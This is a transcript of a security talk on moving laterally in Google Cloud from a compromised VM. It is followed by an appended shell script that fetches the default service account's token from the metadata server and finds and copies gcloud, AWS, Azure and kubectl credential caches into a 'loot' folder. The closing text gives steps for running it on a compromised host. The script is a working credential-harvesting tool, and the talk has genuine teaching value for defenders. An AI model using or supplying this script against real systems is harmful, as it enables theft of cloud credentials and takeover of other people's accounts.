
Here we see that it's not a problem. It's not a vulnerability that we can patch, because the problem here is how we as IT persons use our systems. Before we go into how I got into GitHub, GitLab, we're going to ask another question which we sort of skipped over: even if they had network access from the Docker container to the Jenkins interface, they still needed to have the credentials, right? So how they did that is a longer story, and it starts in Google Cloud. We're going to talk about lateral movement in Google Cloud, and assume that the threat actor has compromised one machine in Google Cloud.
So one thing which is kind of interesting is that if you just, you know, spin up a new VM in GCP and you just do next, next, next, next, next, next, then you're going to get these default service accounts that are going to run, because every machine needs to have this service account. And that one actually has quite generous permissions, including reading your buckets. So in some cases, if you're live on the machine, you can query this internal metadata, right? But anyway, you can query this if someone has compromised the machine. They can read out what this service account is and what its permissions are.
So that's one way, which is very interesting, that you can find on the compromised cloud machine. Another one is those CLI utilities that everyone is using. So assume that you have a fairly locked-down network. It's only able to access APIs from this specific server. What's going to happen is that someone is going to remote into that server. Then they want to use the Google Cloud CLI tool, or, you know, you have the AWS CLI, you have az and so on for the different vendors. But what happens is that they log in, they are then on that specific server, they do a cloud init or whatever command, and they need to enter and authenticate the token, and that's going to be saved in their user profile. So if a threat actor then comes along and compromises that machine, then they can of course dump whatever is in that user profile. And all of a sudden they are inside that same context that the CLI program is in. And on Linux it would be, yeah, under your .config or whatever, right? These are sometimes encrypted, sometimes plain text and so on, but what's sort of a good rule of thumb is: do you need to enter a password every single time you're using this? No. So then it's probably reversible encryption. Right? So the easiest way, like you can probably dump this in a really fancy, cool way, but the easiest way is probably just copy everything that is in that config folder, paste it on your own machine, and then all of a sudden it just works. So it's fairly easy to dump this.
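The two collection steps the speaker describes, written out as a shell script. This is an added example, not code from the talk: the metadata endpoints and the `Metadata-Flavor: Google` header are Google's documented ones, the credential file names are the well-known cache locations written by `gcloud`, the AWS CLI, `az` and `kubectl`, and the function names, the list itself and the fake profile used for the offline demo are this example's own constructions. Nothing here decrypts anything; it only locates the caches and copies them with their layout intact, which is exactly why "it just works" on the attacker's box.

```shell
#!/bin/sh
# Added example (not from the talk): enumerate the two credential sources
# described above on a compromised GCE VM: the instance metadata service
# and cached cloud-CLI credential stores in user profiles.

# GCE metadata service. The Metadata-Flavor header is mandatory.
GCE_MD="http://metadata.google.internal/computeMetadata/v1"

# gce_md PATH: fetch one metadata path (needs the VM's link-local access
# to the metadata server; not exercised by the offline demo below).
gce_md() {
    curl -sf -H 'Metadata-Flavor: Google' "$GCE_MD/$1"
}

# gce_default_sa: what the attached (often default) service account can do:
# its email, OAuth scopes and a bearer token usable against Google APIs
# without any password.
gce_default_sa() {
    echo "email:  $(gce_md instance/service-accounts/default/email)"
    echo "scopes:"
    gce_md instance/service-accounts/default/scopes | sed 's/^/  /'
    echo "token:  $(gce_md instance/service-accounts/default/token)"
}

# Well-known credential caches written by cloud CLIs after a one-time login.
# None of them prompt for a password on reuse: the "reversible" tell.
CRED_PATHS="
.config/gcloud/credentials.db
.config/gcloud/access_tokens.db
.config/gcloud/application_default_credentials.json
.config/gcloud/legacy_credentials
.aws/credentials
.aws/config
.aws/sso/cache
.aws/cli/cache
.azure/accessTokens.json
.azure/msal_token_cache.json
.azure/azureProfile.json
.kube/config
"

# find_cli_creds HOME: print every cache file/dir that exists under HOME.
find_cli_creds() {
    home="$1"
    for rel in $CRED_PATHS; do
        [ -e "$home/$rel" ] && echo "$home/$rel"
    done
    return 0
}

# count_cli_creds HOME: number of hits (useful for scoring jump hosts).
count_cli_creds() {
    find_cli_creds "$1" | wc -l | tr -d ' '
}

# collect_cli_creds HOME OUTDIR: copy the hits into OUTDIR keeping the
# relative layout, so OUTDIR/* dropped into $HOME elsewhere "just works".
collect_cli_creds() {
    home="$1"; out="$2"
    for rel in $CRED_PATHS; do
        [ -e "$home/$rel" ] || continue
        mkdir -p "$out/$(dirname "$rel")"
        cp -R "$home/$rel" "$out/$rel"
    done
}

# make_fake_profile DIR: constructed profile for the offline demo; the
# contents are placeholders, not real credentials.
make_fake_profile() {
    d="$1"
    mkdir -p "$d/.config/gcloud" "$d/.aws" "$d/.azure"
    echo "CONSTRUCTED-NOT-A-REAL-DB" > "$d/.config/gcloud/credentials.db"
    printf '[default]\naws_access_key_id = AKIAEXAMPLECONSTRUCTED\n' > "$d/.aws/credentials"
    echo '{"constructed": true}' > "$d/.azure/msal_token_cache.json"
}

# Offline demo: sh cred_enum.sh demo
if [ "${1:-}" = "demo" ]; then
    tmp=$(mktemp -d)
    make_fake_profile "$tmp/victim"
    echo "found $(count_cli_creds "$tmp/victim") cache(s):"
    find_cli_creds "$tmp/victim"
    collect_cli_creds "$tmp/victim" "$tmp/loot"
    find "$tmp/loot" -type f
    rm -rf "$tmp"
fi
```

On a real host you would run `gce_default_sa` first (it needs no local credentials at all), then `find_cli_creds /home/<user>` for every profile on the box. The same enumeration, pointed at your own jump hosts, is the cheapest check for the situation the speaker describes: any hit is a credential that lives on that server for as long as the login does.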